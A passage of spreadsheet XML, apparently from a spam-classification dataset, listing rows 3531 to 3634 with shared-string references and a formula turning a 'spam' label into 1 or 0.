    <row r="3531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3531" t="s">
        <v>8627</v>
      </c>
      <c r="B3531" t="s">
        <v>5294</v>
      </c>
      <c r="C3531" s="1">
        <f>IF(B3531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3532" t="s">
        <v>8628</v>
      </c>
      <c r="B3532" t="s">
        <v>5294</v>
      </c>
      <c r="C3532" s="1">
        <f>IF(B3532="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3533" t="s">
        <v>8629</v>
      </c>
      <c r="B3533" t="s">
        <v>5294</v>
      </c>
      <c r="C3533" s="1">
        <f>IF(B3533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3534" t="s">
        <v>5376</v>
      </c>
      <c r="B3534" t="s">
        <v>5294</v>
      </c>
      <c r="C3534" s="1">
        <f>IF(B3534="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3535" t="s">
        <v>8630</v>
      </c>
      <c r="B3535" t="s">
        <v>5294</v>
      </c>
      <c r="C3535" s="1">
        <f>IF(B3535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3536" t="s">
        <v>8631</v>
      </c>
      <c r="B3536" t="s">
        <v>5294</v>
      </c>
      <c r="C3536" s="1">
        <f>IF(B3536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3537" t="s">
        <v>8632</v>
      </c>
      <c r="B3537" t="s">
        <v>5294</v>
      </c>
      <c r="C3537" s="1">
        <f>IF(B3537="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3538" t="s">
        <v>8633</v>
      </c>
      <c r="B3538" t="s">
        <v>5294</v>
      </c>
      <c r="C3538" s="1">
        <f>IF(B3538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3539" t="s">
        <v>8634</v>
      </c>
      <c r="B3539" t="s">
        <v>5294</v>
      </c>
      <c r="C3539" s="1">
        <f>IF(B3539="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3540" t="s">
        <v>8635</v>
      </c>
      <c r="B3540" t="s">
        <v>5294</v>
      </c>
      <c r="C3540" s="1">
        <f>IF(B3540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3541" t="s">
        <v>8636</v>
      </c>
      <c r="B3541" t="s">
        <v>5294</v>
      </c>
      <c r="C3541" s="1">
        <f>IF(B3541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3542" t="s">
        <v>8637</v>
      </c>
      <c r="B3542" t="s">
        <v>5294</v>
      </c>
      <c r="C3542" s="1">
        <f>IF(B3542="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3543" t="s">
        <v>8638</v>
      </c>
      <c r="B3543" t="s">
        <v>5294</v>
      </c>
      <c r="C3543" s="1">
        <f>IF(B3543="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3544" t="s">
        <v>8639</v>
      </c>
      <c r="B3544" t="s">
        <v>5294</v>
      </c>
      <c r="C3544" s="1">
        <f>IF(B3544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3545" t="s">
        <v>8640</v>
      </c>
      <c r="B3545" t="s">
        <v>5294</v>
      </c>
      <c r="C3545" s="1">
        <f>IF(B3545="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3546" t="s">
        <v>8641</v>
      </c>
      <c r="B3546" t="s">
        <v>5294</v>
      </c>
      <c r="C3546" s="1">
        <f>IF(B3546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3547" t="s">
        <v>8642</v>
      </c>
      <c r="B3547" t="s">
        <v>5294</v>
      </c>
      <c r="C3547" s="1">
        <f>IF(B3547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3548" t="s">
        <v>8643</v>
      </c>
      <c r="B3548" t="s">
        <v>5297</v>
      </c>
      <c r="C3548" s="1">
        <f>IF(B3548="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3549" t="s">
        <v>6806</v>
      </c>
      <c r="B3549" t="s">
        <v>5294</v>
      </c>
      <c r="C3549" s="1">
        <f>IF(B3549="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3550" t="s">
        <v>8644</v>
      </c>
      <c r="B3550" t="s">
        <v>5294</v>
      </c>
      <c r="C3550" s="1">
        <f>IF(B3550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3551" t="s">
        <v>8645</v>
      </c>
      <c r="B3551" t="s">
        <v>5294</v>
      </c>
      <c r="C3551" s="1">
        <f>IF(B3551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3552" t="s">
        <v>8646</v>
      </c>
      <c r="B3552" t="s">
        <v>5294</v>
      </c>
      <c r="C3552" s="1">
        <f>IF(B3552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3553" t="s">
        <v>8647</v>
      </c>
      <c r="B3553" t="s">
        <v>5294</v>
      </c>
      <c r="C3553" s="1">
        <f>IF(B3553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3554" t="s">
        <v>8648</v>
      </c>
      <c r="B3554" t="s">
        <v>5294</v>
      </c>
      <c r="C3554" s="1">
        <f>IF(B3554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3555" t="s">
        <v>8649</v>
      </c>
      <c r="B3555" t="s">
        <v>5294</v>
      </c>
      <c r="C3555" s="1">
        <f>IF(B3555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3556" t="s">
        <v>8650</v>
      </c>
      <c r="B3556" t="s">
        <v>5297</v>
      </c>
      <c r="C3556" s="1">
        <f>IF(B3556="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3557" t="s">
        <v>8651</v>
      </c>
      <c r="B3557" t="s">
        <v>5294</v>
      </c>
      <c r="C3557" s="1">
        <f>IF(B3557="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3558" t="s">
        <v>8652</v>
      </c>
      <c r="B3558" t="s">
        <v>5294</v>
      </c>
      <c r="C3558" s="1">
        <f>IF(B3558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3559" t="s">
        <v>8653</v>
      </c>
      <c r="B3559" t="s">
        <v>5294</v>
      </c>
      <c r="C3559" s="1">
        <f>IF(B3559="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3560" t="s">
        <v>8654</v>
      </c>
      <c r="B3560" t="s">
        <v>5297</v>
      </c>
      <c r="C3560" s="1">
        <f>IF(B3560="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3561" t="s">
        <v>8655</v>
      </c>
      <c r="B3561" t="s">
        <v>5294</v>
      </c>
      <c r="C3561" s="1">
        <f>IF(B3561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3562" t="s">
        <v>8656</v>
      </c>
      <c r="B3562" t="s">
        <v>5297</v>
      </c>
      <c r="C3562" s="1">
        <f>IF(B3562="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3563" t="s">
        <v>8657</v>
      </c>
      <c r="B3563" t="s">
        <v>5294</v>
      </c>
      <c r="C3563" s="1">
        <f>IF(B3563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3564" t="s">
        <v>8658</v>
      </c>
      <c r="B3564" t="s">
        <v>5297</v>
      </c>
      <c r="C3564" s="1">
        <f>IF(B3564="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3565" t="s">
        <v>8659</v>
      </c>
      <c r="B3565" t="s">
        <v>5294</v>
      </c>
      <c r="C3565" s="1">
        <f>IF(B3565="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3566" t="s">
        <v>8660</v>
      </c>
      <c r="B3566" t="s">
        <v>5294</v>
      </c>
      <c r="C3566" s="1">
        <f>IF(B3566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3567" t="s">
        <v>8661</v>
      </c>
      <c r="B3567" t="s">
        <v>5294</v>
      </c>
      <c r="C3567" s="1">
        <f>IF(B3567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3568" t="s">
        <v>8662</v>
      </c>
      <c r="B3568" t="s">
        <v>5297</v>
      </c>
      <c r="C3568" s="1">
        <f>IF(B3568="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3569" t="s">
        <v>8663</v>
      </c>
      <c r="B3569" t="s">
        <v>5294</v>
      </c>
      <c r="C3569" s="1">
        <f>IF(B3569="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3570" t="s">
        <v>8664</v>
      </c>
      <c r="B3570" t="s">
        <v>5294</v>
      </c>
      <c r="C3570" s="1">
        <f>IF(B3570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3571" t="s">
        <v>8665</v>
      </c>
      <c r="B3571" t="s">
        <v>5297</v>
      </c>
      <c r="C3571" s="1">
        <f>IF(B3571="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3572" t="s">
        <v>8666</v>
      </c>
      <c r="B3572" t="s">
        <v>5294</v>
      </c>
      <c r="C3572" s="1">
        <f>IF(B3572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3573" t="s">
        <v>8667</v>
      </c>
      <c r="B3573" t="s">
        <v>5294</v>
      </c>
      <c r="C3573" s="1">
        <f>IF(B3573="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3574" t="s">
        <v>8668</v>
      </c>
      <c r="B3574" t="s">
        <v>5297</v>
      </c>
      <c r="C3574" s="1">
        <f>IF(B3574="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3575" t="s">
        <v>8669</v>
      </c>
      <c r="B3575" t="s">
        <v>5294</v>
      </c>
      <c r="C3575" s="1">
        <f>IF(B3575="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3576" t="s">
        <v>8670</v>
      </c>
      <c r="B3576" t="s">
        <v>5294</v>
      </c>
      <c r="C3576" s="1">
        <f>IF(B3576="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3577" t="s">
        <v>8671</v>
      </c>
      <c r="B3577" t="s">
        <v>5294</v>
      </c>
      <c r="C3577" s="1">
        <f>IF(B3577="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3578" t="s">
        <v>8672</v>
      </c>
      <c r="B3578" t="s">
        <v>5294</v>
      </c>
      <c r="C3578" s="1">
        <f>IF(B3578="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3579" t="s">
        <v>8673</v>
      </c>
      <c r="B3579" t="s">
        <v>5294</v>
      </c>
      <c r="C3579" s="1">
        <f>IF(B3579="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3580" t="s">
        <v>8674</v>
      </c>
      <c r="B3580" t="s">
        <v>5294</v>
      </c>
      <c r="C3580" s="1">
        <f>IF(B3580="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3581" t="s">
        <v>8675</v>
      </c>
      <c r="B3581" t="s">
        <v>5294</v>
      </c>
      <c r="C3581" s="1">
        <f>IF(B3581="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3582" t="s">
        <v>8676</v>
      </c>
      <c r="B3582" t="s">
        <v>5294</v>
      </c>
      <c r="C3582" s="1">
        <f>IF(B3582="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3583" t="s">
        <v>8677</v>
      </c>
      <c r="B3583" t="s">
        <v>5294</v>
      </c>
      <c r="C3583" s="1">
        <f>IF(B3583="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3584" t="s">
        <v>8678</v>
      </c>
      <c r="B3584" t="s">
        <v>5294</v>
      </c>
      <c r="C3584" s="1">
        <f>IF(B3584="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3585" t="s">
        <v>7003</v>
      </c>
      <c r="B3585" t="s">
        <v>5297</v>
      </c>
      <c r="C3585" s="1">
        <f>IF(B3585="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3586" t="s">
        <v>8572</v>
      </c>
      <c r="B3586" t="s">
        <v>5294</v>
      </c>
      <c r="C3586" s="1">
        <f>IF(B3586="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3587" t="s">
        <v>8679</v>
      </c>
      <c r="B3587" t="s">
        <v>5297</v>
      </c>
      <c r="C3587" s="1">
        <f>IF(B3587="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3588" t="s">
        <v>8680</v>
      </c>
      <c r="B3588" t="s">
        <v>5294</v>
      </c>
      <c r="C3588" s="1">
        <f>IF(B3588="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3589" t="s">
        <v>8681</v>
      </c>
      <c r="B3589" t="s">
        <v>5294</v>
      </c>
      <c r="C3589" s="1">
        <f>IF(B3589="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3590" t="s">
        <v>8682</v>
      </c>
      <c r="B3590" t="s">
        <v>5294</v>
      </c>
      <c r="C3590" s="1">
        <f>IF(B3590="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3591" t="s">
        <v>8683</v>
      </c>
      <c r="B3591" t="s">
        <v>5294</v>
      </c>
      <c r="C3591" s="1">
        <f>IF(B3591="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3592" t="s">
        <v>8684</v>
      </c>
      <c r="B3592" t="s">
        <v>5294</v>
      </c>
      <c r="C3592" s="1">
        <f>IF(B3592="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3593" t="s">
        <v>8685</v>
      </c>
      <c r="B3593" t="s">
        <v>5294</v>
      </c>
      <c r="C3593" s="1">
        <f>IF(B3593="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3594" t="s">
        <v>5376</v>
      </c>
      <c r="B3594" t="s">
        <v>5294</v>
      </c>
      <c r="C3594" s="1">
        <f>IF(B3594="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3595" t="s">
        <v>8686</v>
      </c>
      <c r="B3595" t="s">
        <v>5297</v>
      </c>
      <c r="C3595" s="1">
        <f>IF(B3595="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3596" t="s">
        <v>8687</v>
      </c>
      <c r="B3596" t="s">
        <v>5294</v>
      </c>
      <c r="C3596" s="1">
        <f>IF(B3596="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3597" t="s">
        <v>8688</v>
      </c>
      <c r="B3597" t="s">
        <v>5294</v>
      </c>
      <c r="C3597" s="1">
        <f>IF(B3597="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3598" t="s">
        <v>8689</v>
      </c>
      <c r="B3598" t="s">
        <v>5297</v>
      </c>
      <c r="C3598" s="1">
        <f>IF(B3598="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3599" t="s">
        <v>8690</v>
      </c>
      <c r="B3599" t="s">
        <v>5294</v>
      </c>
      <c r="C3599" s="1">
        <f>IF(B3599="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3600" t="s">
        <v>8691</v>
      </c>
      <c r="B3600" t="s">
        <v>5294</v>
      </c>
      <c r="C3600" s="1">
        <f>IF(B3600="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3601" t="s">
        <v>8692</v>
      </c>
      <c r="B3601" t="s">
        <v>5294</v>
      </c>
      <c r="C3601" s="1">
        <f>IF(B3601="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3602" t="s">
        <v>8693</v>
      </c>
      <c r="B3602" t="s">
        <v>5294</v>
      </c>
      <c r="C3602" s="1">
        <f>IF(B3602="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3603" t="s">
        <v>8694</v>
      </c>
      <c r="B3603" t="s">
        <v>5294</v>
      </c>
      <c r="C3603" s="1">
        <f>IF(B3603="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3604" t="s">
        <v>8695</v>
      </c>
      <c r="B3604" t="s">
        <v>5294</v>
      </c>
      <c r="C3604" s="1">
        <f>IF(B3604="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3605" t="s">
        <v>8696</v>
      </c>
      <c r="B3605" t="s">
        <v>5294</v>
      </c>
      <c r="C3605" s="1">
        <f>IF(B3605="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3606" t="s">
        <v>8697</v>
      </c>
      <c r="B3606" t="s">
        <v>5294</v>
      </c>
      <c r="C3606" s="1">
        <f>IF(B3606="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3607" t="s">
        <v>8698</v>
      </c>
      <c r="B3607" t="s">
        <v>5294</v>
      </c>
      <c r="C3607" s="1">
        <f>IF(B3607="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3608" t="s">
        <v>8699</v>
      </c>
      <c r="B3608" t="s">
        <v>5294</v>
      </c>
      <c r="C3608" s="1">
        <f>IF(B3608="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3609" t="s">
        <v>8700</v>
      </c>
      <c r="B3609" t="s">
        <v>5294</v>
      </c>
      <c r="C3609" s="1">
        <f>IF(B3609="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3610" t="s">
        <v>8517</v>
      </c>
      <c r="B3610" t="s">
        <v>5294</v>
      </c>
      <c r="C3610" s="1">
        <f>IF(B3610="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3611" t="s">
        <v>8701</v>
      </c>
      <c r="B3611" t="s">
        <v>5294</v>
      </c>
      <c r="C3611" s="1">
        <f>IF(B3611="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3612" t="s">
        <v>8702</v>
      </c>
      <c r="B3612" t="s">
        <v>5294</v>
      </c>
      <c r="C3612" s="1">
        <f>IF(B3612="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3613" t="s">
        <v>8703</v>
      </c>
      <c r="B3613" t="s">
        <v>5294</v>
      </c>
      <c r="C3613" s="1">
        <f>IF(B3613="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3614" t="s">
        <v>8704</v>
      </c>
      <c r="B3614" t="s">
        <v>5294</v>
      </c>
      <c r="C3614" s="1">
        <f>IF(B3614="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3615" t="s">
        <v>8705</v>
      </c>
      <c r="B3615" t="s">
        <v>5294</v>
      </c>
      <c r="C3615" s="1">
        <f>IF(B3615="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3616" t="s">
        <v>8706</v>
      </c>
      <c r="B3616" t="s">
        <v>5294</v>
      </c>
      <c r="C3616" s="1">
        <f>IF(B3616="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3617" t="s">
        <v>8707</v>
      </c>
      <c r="B3617" t="s">
        <v>5294</v>
      </c>
      <c r="C3617" s="1">
        <f>IF(B3617="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3618" t="s">
        <v>8708</v>
      </c>
      <c r="B3618" t="s">
        <v>5294</v>
      </c>
      <c r="C3618" s="1">
        <f>IF(B3618="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3619" t="s">
        <v>8709</v>
      </c>
      <c r="B3619" t="s">
        <v>5294</v>
      </c>
      <c r="C3619" s="1">
        <f>IF(B3619="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3620" t="s">
        <v>8710</v>
      </c>
      <c r="B3620" t="s">
        <v>5297</v>
      </c>
      <c r="C3620" s="1">
        <f>IF(B3620="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3621" t="s">
        <v>8711</v>
      </c>
      <c r="B3621" t="s">
        <v>5294</v>
      </c>
      <c r="C3621" s="1">
        <f>IF(B3621="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3622" t="s">
        <v>8712</v>
      </c>
      <c r="B3622" t="s">
        <v>5294</v>
      </c>
      <c r="C3622" s="1">
        <f>IF(B3622="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3623" t="s">
        <v>8713</v>
      </c>
      <c r="B3623" t="s">
        <v>5294</v>
      </c>
      <c r="C3623" s="1">
        <f>IF(B3623="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3624" t="s">
        <v>8714</v>
      </c>
      <c r="B3624" t="s">
        <v>5294</v>
      </c>
      <c r="C3624" s="1">
        <f>IF(B3624="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3625" t="s">
        <v>7583</v>
      </c>
      <c r="B3625" t="s">
        <v>5294</v>
      </c>
      <c r="C3625" s="1">
        <f>IF(B3625="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3626" t="s">
        <v>8715</v>
      </c>
      <c r="B3626" t="s">
        <v>5294</v>
      </c>
      <c r="C3626" s="1">
        <f>IF(B3626="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3627" t="s">
        <v>8716</v>
      </c>
      <c r="B3627" t="s">
        <v>5294</v>
      </c>
      <c r="C3627" s="1">
        <f>IF(B3627="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3628" t="s">
        <v>8657</v>
      </c>
      <c r="B3628" t="s">
        <v>5294</v>
      </c>
      <c r="C3628" s="1">
        <f>IF(B3628="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3629" t="s">
        <v>6338</v>
      </c>
      <c r="B3629" t="s">
        <v>5294</v>
      </c>
      <c r="C3629" s="1">
        <f>IF(B3629="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3630" t="s">
        <v>8717</v>
      </c>
      <c r="B3630" t="s">
        <v>5294</v>
      </c>
      <c r="C3630" s="1">
        <f>IF(B3630="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3631" t="s">
        <v>8718</v>
      </c>
      <c r="B3631" t="s">
        <v>5297</v>
      </c>
      <c r="C3631" s="1">
        <f>IF(B3631="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3632" t="s">
        <v>8719</v>
      </c>
      <c r="B3632" t="s">
        <v>5294</v>
      </c>
      <c r="C3632" s="1">
        <f>IF(B3632="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3633" t="s">
        <v>8720</v>
      </c>
      <c r="B3633" t="s">
        <v>5294</v>
      </c>
      <c r="C3633" s="1">
        <f>IF(B3633="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3634" t="s">
        <v>8721</v>
      </c>
      <c r="B3634" t="s">
        <v>5294</v>
      </c>
      <c r="C3634" s="1">
        <f>IF(B3634="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
